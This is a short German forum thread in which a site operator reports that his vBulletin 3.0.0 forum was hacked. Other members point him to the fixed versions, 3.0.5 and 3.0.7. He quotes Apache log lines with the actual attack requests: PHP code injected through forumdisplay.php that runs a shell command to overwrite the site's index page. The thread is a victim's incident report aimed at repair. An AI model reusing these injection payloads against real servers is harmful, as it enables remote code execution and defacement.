Sicherheitsproblem in vB 3.0.0

[dhr]

Hallo!

Mein Server wurde soeben durch folgende URL-Aufrufe gehackt (Auszug aus dem Apache-Log, combined-format):



212.138.47.21 - - [23/Feb/2005:00:14:15 +0100] "GET /forum/forumdisplay.php?f=1&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=echo%20hacked%20by%20fbi_saudi%20/var/www/de.jurathek/www/index.php HTTP/1.0" 200 55 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar)"


212.138.47.15 - - [23/Feb/2005:00:14:38 +0100] "GET /forum/forumdisplay.php?f=1&GLOBALS[]=1&comma={${system($cmd)}}{${exit()}}&cmd=echo%20hacked%20by%20fbi_saudi%20%20>%20/var/www/de.jurathek/www/index.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar)"


Ich habe noch nicht nachgesehen, ob diese Lücke > 3.0.0 bereits behoben ist. Ich werde mich nun erstmal an die Reparaturarbeiten machen und die forumdisplay.php notdürftig patchen, bis ich Gelegenheit habe, auf 3.0.6 zu aktualisieren.

MfG,

Daniel H. Reichelt

[Mystics]

Ja, ist bereits behoben (in 3.0.5).

[h75]

Und am besten dann direkt auf 3.0.7 hochgehen Gibts auch schon....

[dhr]

Danke für die schnellen Antworten! Mein Patch hatte notdürftig gehalten, habe heute auf 307 aktualisiert... gewohnt problemlos.

Gruß,
Daniel